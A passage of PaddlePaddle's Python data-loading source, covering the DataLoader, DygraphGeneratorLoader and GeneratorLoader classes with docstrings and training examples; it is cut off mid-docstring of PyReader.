instance of subclass of :code:`paddle.io.Dataset` or
:code:`paddle.io.IterableDataset`.
feed_list (list(Tensor)|tuple(Tensor)): feed Tensor list.
The Tensors should be created by :code:`paddle.static.data()`.
:attr:`feed_list` must be set if :attr:`return_list` is
False. Default None.
places(list(Place)|tuple(Place)|list(str)|optional): a list of Place,
to put data onto, :attr:`places` can be None, if
:attr:`places` is None, default place(CPUPlace or CUDAPlace(0))
will be used. Default None. If ``places`` is list of string,
the string in the list can be ``cpu``, ``gpu:x`` and ``gpu_pinned``,
where ``x`` is the index of the GPUs.
return_list (bool): whether the return value on each device is
presented as a list. If :attr:`return_list=False`, the return
value on each device would be a dict of str -> Tensor, where
the key of the dict is the name of each fed Tensors. If
:attr:`return_list=True`, the return value on each device would
be a list(Tensor). :attr:`return_list` can only be True
in dynamic graph mode. Default True.
batch_sampler(BatchSampler): an instance of `paddle.io.BatchSampler`
to generate batch indices to draw samples from :attr:`dataset`
and combine a batch. Default None.
batch_size(int|None): sample number in a mini-batch, a substitution
parameter for :attr:`batch_sampler`, if :attr:`batch_sampler`
is not set, a default `paddle.io.BatchSampler` will be used
and initialize by :attr:`batch_size`, :attr:`shuffle` and
:attr:`drop_last`. Default 1.
shuffle(bool): whther to shuffle indices order before genrate
batch indices, a substitution parameter for :attr:`batch_sampler`
see :attr:`batch_size`. Default False.
drop_last(bool): whether drop the last incomplete batch dataset size
is not divisible by the batch size, a substitution parameter
for :attr:`batch_sampler`, see :attr:`batch_size`. Default False
collate_fn(callable): function to generate mini-batch data by merging
the sample list, None for only stack each fields of sample in axis
0(same as :attr::`np.stack(..., axis=0)`). Default None
num_workers(int): the number of subprocess to load data, 0 for no
subprocess used and loading data in main process. Default 0
use_buffer_reader (bool): whether to use bufferred reader.
If use_buffer_reader=True, the DataLoader would prefetch next
batch data asynchronously, so it would speed up data feeding
and occupies a little more CPU or GPU memory, i.e., the memory
of one batch input data. Default True.
use_shared_memory (bool): whether to use shared memory to speed up
putting data into inter-process queue, set :attr:`use_shared_memory`
as True only when the shared memory space on your machine(e.g.
space of '/dev/shm' on Linux operating sysytem) is large enough.
Shared memory will only be enabled in multi-process mode(num_workers
> 0). Default True.
timeout(int): the timeout value for getting data form output queue
of subprocesses. Default 0.
worker_init_fn(callable): init function which will be called with
worker id on each subproces starting if not set as None. Default
None.
Returns:
DataLoader: an iterable object for data iterating, each elemnet of the generated data is a Tensor.
Examples:
.. code-block:: python
import numpy as np
import paddle
import paddle.nn as nn
import paddle.nn.functional as F
from paddle.io import Dataset, BatchSampler, DataLoader
BATCH_NUM = 20
BATCH_SIZE = 16
EPOCH_NUM = 4
IMAGE_SIZE = 784
CLASS_NUM = 10
# define a random dataset
class RandomDataset(Dataset):
def __init__(self, num_samples):
self.num_samples = num_samples
def __getitem__(self, idx):
image = np.random.random([IMAGE_SIZE]).astype('float32')
label = np.random.randint(0, CLASS_NUM - 1, (1, )).astype('int64')
return image, label
def __len__(self):
return self.num_samples
dataset = RandomDataset(BATCH_NUM * BATCH_SIZE)
class SimpleNet(nn.Layer):
def __init__(self):
super(SimpleNet, self).__init__()
self.fc = nn.Linear(IMAGE_SIZE, CLASS_NUM)
def forward(self, image, label=None):
return self.fc(image)
simple_net = SimpleNet()
opt = paddle.optimizer.SGD(learning_rate=1e-3,
parameters=simple_net.parameters())
loader = DataLoader(dataset,
batch_size=BATCH_SIZE,
shuffle=True,
drop_last=True,
num_workers=2)
for e in range(EPOCH_NUM):
for i, (image, label) in enumerate(loader()):
out = simple_net(image)
loss = F.cross_entropy(out, label)
avg_loss = paddle.mean(loss)
avg_loss.backward()
opt.minimize(avg_loss)
simple_net.clear_gradients()
print("Epoch {} batch {}: loss = {}".format(e, i, np.mean(loss.numpy())))
.. note::
For reading iterable dataset with multiprocess Dataloader,
please see :code:`paddle.io.IterableDataset`
"""
def __init__(self,
dataset,
feed_list=None,
places=None,
return_list=True,
batch_sampler=None,
batch_size=1,
shuffle=False,
drop_last=False,
collate_fn=None,
num_workers=0,
use_buffer_reader=True,
use_shared_memory=True,
timeout=0,
worker_init_fn=None,
persistent_workers=False):
self.return_list = return_list
self.collate_fn = collate_fn
self.use_buffer_reader = use_buffer_reader
self.worker_init_fn = worker_init_fn
assert isinstance(dataset, Dataset), \
"dataset should be subclass instance of paddle.io.Dataset"
self.dataset = dataset
if not return_list and not in_dygraph_mode():
assert feed_list is not None, \
"feed_list should be set when return_list=False"
self.feed_list = feed_list
if places is None:
places = _current_expected_place()
if isinstance(places, (list, tuple)):
places = _get_paddle_place_list(places)
else:
places = _get_paddle_place(places)
self.places = _convert_places(places)
assert num_workers >= 0, "num_workers should be a non-negative value"
if num_workers > 0 and (sys.platform == 'darwin' or
sys.platform == 'win32'):
warnings.warn(
"DataLoader with multi-process mode is not supported on MacOs and Windows currently." \
" Please use signle-process mode with num_workers = 0 instead")
num_workers = 0
self.num_workers = num_workers
self.use_shared_memory = use_shared_memory
if use_shared_memory and num_workers == 0:
self.use_shared_memory = False
assert timeout >= 0, "timeout should be a non-negative value"
self.timeout = timeout
if isinstance(dataset, IterableDataset):
self.dataset_kind = _DatasetKind.ITER
if shuffle:
raise ValueError(
"IterableDataset not support shuffle, but got shuffle={}".
format(shuffle))
if batch_sampler is not None:
raise ValueError(
"IterableDataset expect unspecified batch_sampler")
else:
self.dataset_kind = _DatasetKind.MAP
if batch_sampler is not None:
assert batch_size == 1 and not shuffle and not drop_last, \
"batch_size/shuffle/drop_last should not be set when " \
"batch_sampler is given"
self.batch_sampler = batch_sampler
self.batch_size = None
elif batch_size is None:
self.batch_sampler = None
self.batch_size = None
else:
assert batch_size > 0, \
"batch_size should be None or a positive value when " \
"batch_sampler is not given"
self.batch_size = batch_size
if isinstance(dataset, IterableDataset):
self.batch_sampler = _InfiniteIterableSampler(dataset,
batch_size)
else:
self.batch_sampler = BatchSampler(
dataset=dataset,
batch_size=batch_size,
shuffle=shuffle,
drop_last=drop_last)
self.drop_last = drop_last
self.auto_collate_batch = self.batch_sampler is not None
self.pin_memory = False
if in_dygraph_mode():
self.pin_memory = True if use_pinned_memory(
) is None else use_pinned_memory()
self._persistent_workers = persistent_workers
self._iterator = None
def __len__(self):
if self.dataset_kind == _DatasetKind.ITER:
raise ValueError("length of IterableDataset not supported")
else:
if self.auto_collate_batch:
return len(self.batch_sampler)
else:
return len(self.dataset)
def __iter__(self):
if self.num_workers == 0:
return _DataLoaderIterSingleProcess(self)
elif self._persistent_workers:
if self._iterator is None:
self._iterator = _DataLoaderIterMultiProcess(self)
else:
self._iterator._reset()
return self._iterator
else:
return _DataLoaderIterMultiProcess(self)
def __call__(self):
return self.__iter__()
@staticmethod
def from_generator(feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=False,
use_multiprocess=False,
drop_last=True):
"""
.. warning::
This API will be deprecated in the future, it is recommended to use
:code:`paddle.io.DataLoader` which supports multi-processes acceleration.
.. note::
**The framework ensures that the data loading order of DataLoader is exactly the same as the user-defined data source.**
Create a DataLoader object for loading data from Python generator.
Data would be prefetched using Python thread and be pushed
into a queue asynchronously.
The created DataLoader object provides 3 methods to set the data source
:code:`set_sample_generator` , :code:`set_sample_list_generator` and
:code:`set_batch_generator` . Please see the following example codes
to know their usages.
If iterable = True, the created DataLoader object is a Python generator
object, which is iterable using for-range loop.
If iterable = False, the created DataLoader object provides
:code:`start()` and :code:`reset()` method to control the data reading
process.
Args:
feed_list (list(Tensor)|tuple(Tensor)): feed Tensor list.
The Tensors should be created by :code:`fluid.data()`.
capacity (int): capacity of the queue maintained in DataLoader.
The unit is batch number. Set larger capacity if your reader
is fast.
use_double_buffer (bool): whether to use double_buffer_reader.
If use_double_buffer=True, the DataLoader would prefetch next
batch data asynchronously, so it would speed up data feeding
and occupies a little more CPU or GPU memory, i.e., the memory
of one batch input data.
iterable (bool): whether the created DataLoader is iterable.
return_list (bool): whether the return value on each device is
presented as a list. It is only valid when iterable=True.
If return_list=False, the return value on each device would
be a dict of str -> LoDTensor, where the key of the dict is
the name of each fed Tensors. If return_list=True, the
return value on each device would be a list(LoDTensor). It is
recommended to use return_list=False in static graph mode and
use return_list=True in dygraph mode.
use_multiprocess (bool): whether to use multi-process to speed up
the data loading process in dygraph. Note: this parameter only
can be used in the dygraph mode. In the static graph mode,
whether this parameter is set or not has no effect.
The Default value is False.
drop_last (bool): whether to drop the last batches whose number is
less than the CPU core/GPU card number. The default value is
True. In training phase, users should not set drop_last=False,
because all CPU cores/GPU cards must read data from DataLoader.
In inference phase, users can set drop_last=False, so that the
last batches whose number is less than the CPU core/GPU card
number can be tested.
Returns:
loader (DataLoader): the created DataLoader object.
Examples 1:
.. code-block:: python
'''
Example in static graph mode
'''
import numpy as np
import paddle
import paddle.static as static
import paddle.nn.functional as F
BATCH_NUM = 10
BATCH_SIZE = 16
EPOCH_NUM = 4
CLASS_NUM = 10
ITERABLE = True # whether the created DataLoader object is iterable
USE_GPU = False # whether to use GPU
DATA_FORMAT = 'batch_generator' # data format of data source user provides
paddle.enable_static()
def simple_net(image, label):
fc_tmp = static.nn.fc(image, size=CLASS_NUM)
cross_entropy = F.softmax_with_cross_entropy(image, label)
loss = paddle.mean(cross_entropy)
sgd = paddle.optimizer.SGD(learning_rate=1e-3)
sgd.minimize(loss)
return loss
def get_random_images_and_labels(image_shape, label_shape):
image = np.random.random(size=image_shape).astype('float32')
label = np.random.random(size=label_shape).astype('int64')
return image, label
# If the data generator yields one sample each time,
# use DataLoader.set_sample_generator to set the data source.
def sample_generator_creator():
def __reader__():
for _ in range(BATCH_NUM * BATCH_SIZE):
image, label = get_random_images_and_labels([784], [1])
yield image, label
return __reader__
# If the data generator yield list of samples each time,
# use DataLoader.set_sample_list_generator to set the data source.
def sample_list_generator_creator():
def __reader__():
for _ in range(BATCH_NUM):
sample_list = []
for _ in range(BATCH_SIZE):
image, label = get_random_images_and_labels([784], [1])
sample_list.append([image, label])
yield sample_list
return __reader__
# If the data generator yields a batch each time,
# use DataLoader.set_batch_generator to set the data source.
def batch_generator_creator():
def __reader__():
for _ in range(BATCH_NUM):
batch_image, batch_label = get_random_images_and_labels([BATCH_SIZE, 784], [BATCH_SIZE, 1])
yield batch_image, batch_label
return __reader__
# If DataLoader is iterable, use for loop to train the network
def train_iterable(exe, prog, loss, loader):
for _ in range(EPOCH_NUM):
for data in loader():
exe.run(prog, feed=data, fetch_list=[loss])
# If DataLoader is not iterable, use start() and reset() method to control the process
def train_non_iterable(exe, prog, loss, loader):
for _ in range(EPOCH_NUM):
loader.start() # call DataLoader.start() before each epoch starts
try:
while True:
exe.run(prog, fetch_list=[loss])
except paddle.core.EOFException:
loader.reset() # call DataLoader.reset() after catching EOFException
def set_data_source(loader, places):
if DATA_FORMAT == 'sample_generator':
loader.set_sample_generator(sample_generator_creator(), batch_size=BATCH_SIZE, drop_last=True, places=places)
elif DATA_FORMAT == 'sample_list_generator':
loader.set_sample_list_generator(sample_list_generator_creator(), places=places)
elif DATA_FORMAT == 'batch_generator':
loader.set_batch_generator(batch_generator_creator(), places=places)
else:
raise ValueError('Unsupported data format')
image = static.data(name='image', shape=[None, 784], dtype='float32')
label = static.data(name='label', shape=[None, 1], dtype='int64')
# Define DataLoader
loader = paddle.io.DataLoader.from_generator(feed_list=[image, label], capacity=16, iterable=ITERABLE)
# Define network
loss = simple_net(image, label)
# Set data source of DataLoader
#
# If DataLoader is iterable, places must be given and the number of places must be the same with device number.
# - If you are using GPU, call `paddle.static.cuda_places()` to get all GPU places.
# - If you are using CPU, call `paddle.static.cpu_places()` to get all CPU places.
#
# If DataLoader is not iterable, places can be None.
places = static.cuda_places() if USE_GPU else static.cpu_places()
set_data_source(loader, places)
exe = static.Executor(places[0])
exe.run(static.default_startup_program())
prog = static.CompiledProgram(static.default_main_program()).with_data_parallel(loss_name=loss.name)
if loader.iterable:
train_iterable(exe, prog, loss, loader)
else:
train_non_iterable(exe, prog, loss, loader)
Examples 2:
.. code-block:: python
'''
Example in dynamic graph mode.
'''
import numpy as np
import paddle
import paddle.nn as nn
import paddle.optimizer as opt
import paddle.distributed as dist
BATCH_SIZE = 16
BATCH_NUM = 4
EPOCH_NUM = 4
IMAGE_SIZE = 784
CLASS_NUM = 10
USE_GPU = False # whether to use GPU
def _get_random_images_and_labels(image_shape, label_shape):
image = np.random.random(size=image_shape).astype('float32')
label = np.random.random(size=label_shape).astype('int64')
return image, label
def __reader__():
for _ in range(BATCH_NUM):
batch_image, batch_label = _get_random_images_and_labels(
[BATCH_SIZE, IMAGE_SIZE], [BATCH_SIZE, CLASS_NUM])
yield batch_image, batch_label
def random_batch_reader():
return __reader__
class LinearNet(nn.Layer):
def __init__(self):
super(LinearNet, self).__init__()
self._linear = nn.Linear(IMAGE_SIZE, CLASS_NUM)
@paddle.jit.to_static
def forward(self, x):
return self._linear(x)
# set device
paddle.set_device('gpu' if USE_GPU else 'cpu')
# create network
layer = LinearNet()
dp_layer = paddle.DataParallel(layer)
loss_fn = nn.CrossEntropyLoss()
adam = opt.Adam(learning_rate=0.001, parameters=dp_layer.parameters())
# create data loader
loader = paddle.io.DataLoader.from_generator(capacity=5)
loader.set_batch_generator(random_batch_reader())
for epoch_id in range(EPOCH_NUM):
for batch_id, (image, label) in enumerate(loader()):
out = layer(image)
loss = loss_fn(out, label)
loss.backward()
adam.step()
adam.clear_grad()
print("Epoch {} batch {}: loss = {}".format(
epoch_id, batch_id, np.mean(loss.numpy())))
Examples 3:
.. code-block:: python
'''
Example of `drop_last` using in static graph multi-cards mode
'''
import paddle
import paddle.static as static
import numpy as np
import os
# We use 2 CPU cores to run inference network
os.environ['CPU_NUM'] = '2'
paddle.enable_static()
# The data source has only 3 batches, which can not be
# divided evenly to each CPU core
def batch_generator():
for i in range(3):
yield np.array([i+1]).astype('float32'),
x = static.data(name='x', shape=[None], dtype='float32')
y = x * x
def run_inference(drop_last):
loader = paddle.io.DataLoader.from_generator(feed_list=[x],
capacity=8, drop_last=drop_last)
loader.set_batch_generator(batch_generator, static.cpu_places())
exe = static.Executor(paddle.CPUPlace())
prog = static.CompiledProgram(static.default_main_program())
prog = prog.with_data_parallel()
result = []
for data in loader():
each_ret, = exe.run(prog, feed=data, fetch_list=[y])
result.extend(each_ret)
return result
# Set drop_last to True, so that the last batch whose
# number is less than CPU core number would be discarded.
print(run_inference(drop_last=True)) # [1.0, 4.0]
# Set drop_last to False, so that the last batch whose
# number is less than CPU core number can be tested.
print(run_inference(drop_last=False)) # [1.0, 4.0, 9.0]
"""
if in_dygraph_mode():
return DygraphGeneratorLoader(feed_list, capacity,
use_double_buffer, iterable,
return_list, use_multiprocess)
else:
return GeneratorLoader(feed_list, capacity, use_double_buffer,
iterable, return_list, drop_last)
@staticmethod
def from_dataset(dataset, places, drop_last=True):
"""
.. warning::
This API will be deprecated in the future, it is recommended to use
:code:`paddle.io.DataLoader` which supports multi-processes acceleration.
Create an iterable DataLoader object for loading data from Dataset.
Dataset is only supported in Linux system currently.
Args:
dataset (InMemoryDataset|QueueDataset): the dataset object.
places (list(CUDAPlace)|list(CPUPlace)|list(str)): places where the result
data should be converted. If places is list of string, the string in the list
can be ``cpu``, ``gpu:x`` and ``gpu_pinned``, where x is the index of the GPUs.
drop_last (bool): whether to drop the last batch whose sample
number is less than batch size. If drop_last = True, they
would be dropped. If drop_last = False, they would be kept.
Returns:
loader (DataLoader): the created DataLoader object, which can be
treated as a Python generator.
Examples:
.. code-block:: python
import paddle
import paddle.static as static
paddle.enable_static()
image = static.data(name='image', shape=[None, 784], dtype='float32')
label = static.data(name='label', shape=[None, 1], dtype='int64')
dataset = paddle.distributed.QueueDataset()
dataset.init(
batch_size=32,
pipe_command='cat',
use_var=[image, label])
dataset.set_filelist(['a.txt', 'b.txt', 'c.txt'])
loader = paddle.io.DataLoader.from_dataset(dataset, static.cpu_places())
"""
return DatasetLoader(dataset, places, drop_last)
class DygraphGeneratorLoader(DataLoaderBase):
"""
The GeneratorLoader of dygraph
The multiprocess dygraph GeneratorLoader's most functions are different from
static graph GeneratorLoader, Separate implementation to keep code readable.
"""
def __init__(self,
feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=True,
use_multiprocess=False):
self._batch_reader = None
self._places = None
self._feed_list = feed_list
if not capacity:
raise ValueError("Please give value to capacity.")
self._capacity = capacity
self._use_double_buffer = use_double_buffer
if not iterable:
warnings.warn(
"Please NOTE: DygraphGeneratorLoader supports iterable mode only. Change to iterable mode."
)
self._iterable = True
if not return_list:
warnings.warn(
"Please NOTE: DygraphGeneratorLoader supports returning as list only. Change to return as list."
)
self._return_list = True
# NOTE: the multiprocessing in different platform is incompatible, we will solve it later
self._use_multiprocess = use_multiprocess
if self._use_multiprocess and (sys.platform == 'darwin' or
sys.platform == 'win32'):
warnings.warn(
"NOTE: DygraphGeneratorLoader with multiprocess mode is not currently supported on MacOs and Windows."
)
self._use_multiprocess = False
if self._use_multiprocess:
# NOTE: the multiprocessing.Queue used to save loading data in self._process
self._data_queue = None
# NOTE: this process is used to load data asynchronously from self._batch_reader
self._process = None
# NOTE: the C++ LoDTensorBlockingQueue instance
self._blocking_queue = None
# NOTE: 1. In multiprocess mode, this thread is used to get next batch data from
# self._data_queue, then push it into self._blocking_queue; 2. In singleprocess
# mode, this thread is used to get next batch data from self._batch_reader, then
# push it into self._blocking_queue
self._thread = None
self._pin_memory = True if use_pinned_memory(
) is None else use_pinned_memory()
@property
def queue(self):
return self._blocking_queue
@property
def iterable(self):
return self._iterable
def _clear_and_remove_data_queue(self):
if self._data_queue is not None:
while True:
try:
self._data_queue.get_nowait()
except queue.Empty:
break
global multiprocess_queue_set
multiprocess_queue_set.remove(self._data_queue)
def _wait_thread_ends(self):
thread = self._thread
if thread is not None:
self._blocking_queue.close()
thread.join()
def _wait_process_ends(self):
process = self._process
if process is not None:
process.join()
# erase process id
core._erase_process_pids(id(self))
def _init_iterable(self):
self._wait_thread_ends()
if self._use_multiprocess:
self._wait_process_ends()
self._var_names = []
self._shapes = []
self._dtypes = []
self._need_check_feed = []
self._blocking_queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._capacity, False)
self._reader = None
self._reader = core.create_py_reader(
self.queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_double_buffer, True,
self._pin_memory)
def _start(self):
if self._use_multiprocess:
# clear old _data_queue and remove it from multiprocess_queue_set
self._clear_and_remove_data_queue()
# set data_queue and process
self._data_queue = multiprocessing.Queue(self._capacity)
# add _data_queue into global queue set
global multiprocess_queue_set
multiprocess_queue_set.add(self._data_queue)
self._process = multiprocessing.Process(
target=_reader_process_loop,
args=(self._batch_reader, self._data_queue))
self._process.daemon = True
self._process.start()
# Set child process signal handler
# NOTE: [ avoiding hang ] 1. if the child process dies due to bus error/segfault
# or just hang, the main process will hang waiting for data, so here need to deal
# with SIGSEGV and SIGBUS of child process; 2. if the main process end before child
# process, it shuts the all its daemonic children down with a SIGTERM (instead of
# joining them without a timeout), so here nedd to deal with SIGTERM.
core._set_process_pids(id(self), [self._process.pid])
_set_SIGCHLD_handler()
# Set reader_thread
self._thread_done_event = threading.Event()
self._thread = threading.Thread(
target=self._reader_thread_loop_for_multiprocess,
args=(_current_expected_place(), ))
self._thread.daemon = True
self._thread.start()
else:
self._thread = threading.Thread(
target=self._reader_thread_loop_for_singleprocess,
args=(_current_expected_place(), ))
self._thread.daemon = True
self._thread.start()
def _reset(self):
self._reader.reset()
self._wait_thread_ends()
if self._use_multiprocess:
self._wait_process_ends()
def __iter__(self):
assert self.iterable, "DataLoader is not iterable"
assert self._batch_reader is not None, \
"Data source of DataLoader has not set yet"
self._init_iterable()
self._start()
return self
def __next__(self):
try:
if _in_eager_mode():
return core.eager.read_next_tensor_list(
self._reader.read_next_list()[0])
else:
return self._reader.read_next_var_list()
except StopIteration:
self._reset()
six.reraise(*sys.exc_info())
def _exit_thread_expectedly(self):
self._thread_done_event.set()
self._blocking_queue.close()
def _exit_thread_unexpectedly(self):
self._thread_done_event.set()
self._blocking_queue.kill()
logging.error("DataLoader reader thread raised an exception!")
def _reader_thread_loop_for_multiprocess(self, legacy_expected_place):
# See _DataLoaderIterSingleProcess._thread_loop() for why set expected place here.
_set_expected_place(legacy_expected_place)
while not self._thread_done_event.is_set():
try:
# NOTE: [ avoid hanging ] Even with carefully designed data dependencies
# (i.e., a put() always corresponding to a get()), hanging on get() can
# still happen when data in queue is corrupted (e.g., due to
# Queue.cancel_join_thread or unexpected exit). So we set a timeout whenever
# we try to get data from `data_queue`
# NOTE: [ avoid failed quickly ] Here, the time setting of QUEUE_GET_TIMEOUT
# is relatively long, currently it is 60 seconds, because in some models,
# if the reader child process starts with a heavy burden, the child process
# has no enough time to put the data in the queue when the main process
# start trying to get data from queue. At this time, the child thread needs
# to wait slightly longer
tensor_list = self._data_queue.get(timeout=QUEUE_GET_TIMEOUT)
except:
# NOTE [ avoid handing ] After adding the shared memory mechanism, not only
# the queue.Empty exception will occur here, but other exceptions will also
# occur, such as mmap failure. If it is not handled here, it will hang.
self._exit_thread_unexpectedly()
logging.error(
"DataLoader reader thread failed to read data from the multiprocessing.Queue."
)
six.reraise(*sys.exc_info())
if not self._thread_done_event.is_set():
if tensor_list is not None:
try:
array = core.LoDTensorArray()
for tensor in tensor_list:
array.append(tensor)
if not self._blocking_queue.push(array):
self._blocking_queue.close()
except:
self._exit_thread_unexpectedly()
six.reraise(*sys.exc_info())
else:
self._exit_thread_expectedly()
def _reader_thread_loop_for_singleprocess(self, legacy_expected_place):
try:
# See _DataLoaderIterSingleProcess._thread_loop() for why set expected place here.
_set_expected_place(legacy_expected_place)
for sample in self._batch_reader():
array = core.LoDTensorArray()
for item in sample:
if not isinstance(item, core.LoDTensor):
item = self._check_input_array(item)
tmp = core.LoDTensor()
tmp.set(item, core.CPUPlace())
item = tmp
array.append(item)
if not self._blocking_queue.push(array):
break
self._blocking_queue.close()
self._thread = None
except Exception:
self._blocking_queue.kill()
self._thread = None
logging.warning(
"DygraphDataLoader reader thread raised an exception.")
six.reraise(*sys.exc_info())
def set_sample_generator(self,
reader,
batch_size,
drop_last=True,
places=None):
assert batch_size > 0, "batch_size must be larger than 0"
if isinstance(places, (list, tuple)):
places = _get_paddle_place_list(places)
else:
places = _get_paddle_place(places)
self.set_sample_list_generator(
paddle.batch(
reader, batch_size=batch_size, drop_last=drop_last),
places=places)
return self
def set_sample_list_generator(self, reader, places=None):
if isinstance(places, (list, tuple)):
places = _get_paddle_place_list(places)
else:
places = _get_paddle_place(places)
def __batch_reader_impl__():
for batch in reader():
slots = []
for items in batch:
for i, item in enumerate(items):
if len(slots) < len(items):
slots.append([item])
else:
slots[i].append(item)
yield slots
self.set_batch_generator(__batch_reader_impl__, places)
return self
def set_batch_generator(self, reader, places=None):
if isinstance(places, (list, tuple)):
places = _get_paddle_place_list(places)
else:
places = _get_paddle_place(places)
self._batch_reader = reader
if places is None:
places = _current_expected_place()
self._places = _convert_places(places)
assert len(self._places) == 1, \
"Number of places must be 1 in imperative mode"
return self
class GeneratorLoader(DataLoaderBase):
def __init__(self,
feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=False,
drop_last=True):
self._tensor_reader = None
self._places = None
self._thread = None
self._queue = None
self._feed_list = feed_list
self._exited = False
self._drop_last = drop_last
self._keep_order = keep_data_loader_order()
if not capacity:
raise ValueError("Please give value to capacity.")
self._iterable = iterable
self._return_list = return_list
if not self._feed_list:
raise Exception("Feed list must be given under static mode.")
self._use_double_buffer = use_double_buffer
self._capacity = capacity
if not self._iterable:
self._init_non_iterable()
def _wait_thread_ends(self):
# Get self._thread first to prevent data race, because __thread_main__
# would set self._thread be None at the end
thread = self._thread
if thread is not None and self._iterable:
self._queue.close()
thread.join()
def _init_iterable(self):
self._wait_thread_ends()
self._var_names = [v.name for v in self._feed_list]
self._shapes = [v.shape for v in self._feed_list]
self._dtypes = [v.dtype for v in self._feed_list]
self._need_check_feed = [
v.desc.need_check_feed() for v in self._feed_list
]
self._queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._capacity, self._keep_order)
self._reader = None
self._reader = core.create_py_reader(
self.queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_double_buffer,
self._drop_last, False)
def _init_non_iterable(self):
lod_levels = []
dtypes = []
shape_concat = []
ranks = []
shapes = []
need_check_feed = []
for feed_data in self._feed_list:
dtypes.append(feed_data.dtype)
shape_concat.extend(feed_data.shape)
ranks.append(len(feed_data.shape))
shapes.append(feed_data.shape)
lod_levels.append(feed_data.lod_level)
need_check_feed.append(int(feed_data.desc.need_check_feed()))
queue_name = data_loader_unique_name_generator(
'lod_tensor_blocking_queue')
reader_name = data_loader_unique_name_generator('create_py_reader')
double_buffer_name = data_loader_unique_name_generator('double_buffer')
var = global_scope().var(queue_name)
self._queue = core.init_lod_tensor_blocking_queue(var, self._capacity,
self._keep_order)
if self._keep_order:
block = default_main_program().current_block()
else:
block = default_startup_program().current_block()
reader_var = block.create_var(name=reader_name)
dtype_int = [int(t) for t in dtypes]
block.append_op(
type='create_py_reader',
inputs={'blocking_queue': [queue_name]},
outputs={'Out': [reader_var]},
attrs={
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'dtypes': dtype_int,
'need_check_feed': need_check_feed,
'ranks': ranks
})
reader_var.desc.set_dtypes(dtypes)
reader_var.persistable = True
reader_var.stop_gradient = True
if self._keep_order:
main_prog_var = reader_var
reader = main_prog_var
reader.reset = self._queue.reset
else:
main_prog_var = _copy_reader_var_(
default_main_program().current_block(), reader_var)
main_prog_var.stop_gradient = True
main_prog_var.persistable = True
reader = monkey_patch_reader_methods(main_prog_var)
if self._use_double_buffer:
double_buffer_reader = double_buffer(
reader, name=double_buffer_name)
# we return a double buffer reader. However, the reset method comes from
# py_reader.
double_buffer_reader.reset = reader.reset
reader = double_buffer_reader
self._reader = reader
default_main_program().current_block().append_op(
type='read',
inputs={'Reader': [self._reader]},
outputs={'Out': self._feed_list},
attrs={'drop_last': self._drop_last})
@property
def queue(self):
return self._queue
@property
def iterable(self):
return self._iterable
def __iter__(self):
assert self.iterable, "DataLoader is not iterable"
assert self._tensor_reader is not None, \
"Data source of DataLoader has not set yet"
self._init_iterable()
self._start()
return self
def __next__(self):
try:
if self._return_list:
data = self._reader.read_next_list()
for i in range(len(data)):
data[i] = data[i]._move_to_list()
return data
else:
return self._reader.read_next()
except StopIteration:
self._queue.close()
self._reset()
six.reraise(*sys.exc_info())
def start(self):
assert not self._iterable, "start() cannot be called when DataLoader is iterable"
self._start()
def reset(self):
assert not self._iterable, "reset() cannot be called when DataLoader is iterable"
self._reset()
def _start(self):
def __thread_main__(legacy_expected_place):
try:
# See _DataLoaderIterSingleProcess._thread_loop() for why set expected place here.
_set_expected_place(legacy_expected_place)
while not self._queue.wait_for_inited(1):
if self._exited:
return
for tensors in self._tensor_reader():
array = core.LoDTensorArray()
for item in tensors:
if not isinstance(item, core.LoDTensor):
item = self._check_input_array(item)
tmp = core.LoDTensor()
tmp.set(item, core.CPUPlace())
item = tmp
array.append(item)
if not self._queue.push(array):
break
self._queue.close()
self._thread = None
except Exception as ex:
self._queue.kill()
self._thread = None
logging.warning('Your reader has raised an exception!')
six.reraise(*sys.exc_info())
self._thread = threading.Thread(
target=__thread_main__, args=(_current_expected_place(), ))
self._thread.daemon = True
self._thread.start()
def _reset(self):
self._queue.close()
self._exited = True
thread = self._thread
if thread is not None:
thread.join()
self._exited = False
self._reader.reset()
def set_sample_generator(self,
reader,
batch_size,
drop_last=True,
places=None):
assert batch_size > 0, "batch_size must be larger than 0"
if isinstance(places, (list, tuple)):
places = _get_paddle_place_list(places)
else:
places = _get_paddle_place(places)
has_lod = False
for f in self._feed_list:
if f.lod_level != 0:
has_lod = True
break
if has_lod:
self.set_sample_list_generator(
paddle.batch(
reader, batch_size=batch_size, drop_last=drop_last),
places=places)
else:
reader = BatchedTensorProvider(
feed_list=self._feed_list,
place=core.CPUPlace(),
batch_size=batch_size,
generator=reader,
drop_last=drop_last)
self.set_batch_generator(reader, places=places)
return self
def set_sample_list_generator(self, reader, places=None):
if isinstance(places, (list, tuple)):
places = _get_paddle_place_list(places)
else:
places = _get_paddle_place(places)
with program_guard(Program(), Program()):
feeder = DataFeeder(
feed_list=self._feed_list, place=core.CPUPlace())
paddle_reader = feeder.decorate_reader(reader, multi_devices=False)
def __tensor_reader_impl__():
for slots in paddle_reader():
yield [slots[var.name] for var in self._feed_list]
self.set_batch_generator(__tensor_reader_impl__, places)
return self
def set_batch_generator(self, reader, places=None):
if isinstance(places, (list, tuple)):
places = _get_paddle_place_list(places)
else:
places = _get_paddle_place(places)
self._tensor_reader = reader
if self._iterable:
assert places is not None, "Places cannot be None when DataLoader is iterable"
self._places = _convert_places(places)
else:
if places is not None:
logging.info(
'places would be ommited when DataLoader is not iterable')
return self
class PyReader(DataLoaderBase):
r"""
Create a reader object for data feeding in Python.
Data would be prefetched using Python thread and be pushed
into a queue asynchronously. Data in the queue would be extracted
automatically when `Executor.run(...)` is called.
Args:
feed_list (list(Variable)|tuple(Variable)): feed variable list.
The variables should be created by :code:`fluid.layers.data()`.
capacity (int): capacity of the queue maintained in PyReader.
The unit is batch number. Set larger capacity if your reader
is fast.
use_double_buffer (bool): whether to use double_buffer_reader.
If use_double_buffer=True, PyReader would prefetch next
batch data asynchronously, so it would speed up data feeding
and occupies a little more CPU or GPU memory, i.e., the memory
of one batch input data.
iterable (bool): whether the created PyReader is iterable.
return_list (bool): whether the return value on each device is
presented as a list. It is only valid when iterable=True.
If return_list=False, the return value on each device would
be a dict of str -> LoDTensor, where the key of the dict is
the name of each fed variables. If return_list=True, the
